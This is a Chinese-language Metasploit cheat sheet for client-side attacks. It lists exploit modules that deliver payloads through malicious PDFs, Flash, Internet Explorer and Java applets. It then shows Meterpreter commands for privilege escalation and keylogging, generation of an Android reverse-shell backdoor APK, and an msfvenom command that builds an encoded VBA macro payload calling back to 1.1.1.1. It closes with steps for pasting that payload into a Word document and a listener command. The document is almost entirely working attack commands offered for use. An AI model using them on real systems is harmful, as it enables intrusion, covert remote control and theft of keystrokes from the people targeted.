利用Acrobat Reader漏洞执行payload

• 构造PDF文件

exploit/windows/fileformat/adobe_utilprintf

仅支持8.1.2软件版本和XP系统；

• 构造恶意网站

exploit/windows/browser/adobe_utilprintf
  #同理，浏览器上运行pDF

• 之后可以通过Meterpreter进行下一步操作

use priv  #提权
run post/windows/capture/keylog_recorder #键盘记录器

利用Flash插件漏洞执行payload

use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2

利用IE浏览器漏洞执行payload

use exploit/windows/browser/ms14_064_ole_code_execution

利用JRE漏洞执行payload

use exploit/multi/browser/java_jre17_driver_manager

use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types

生成Android后门程序

use payload/android/meterpreter/reverse_tcp
  generate -f raw -p android -o a.apk

VBScript感染方式

• 利用宏感染word、excel文档
• 绕过某些基于文件类型检查的安全机制
• 生成vbscript脚本：

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

• Office 2007

• 视图-宏-创建
• Payload第一部分粘入VBA代码
• Payload第二部分粘入word文档正文；

• Msf启动侦听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp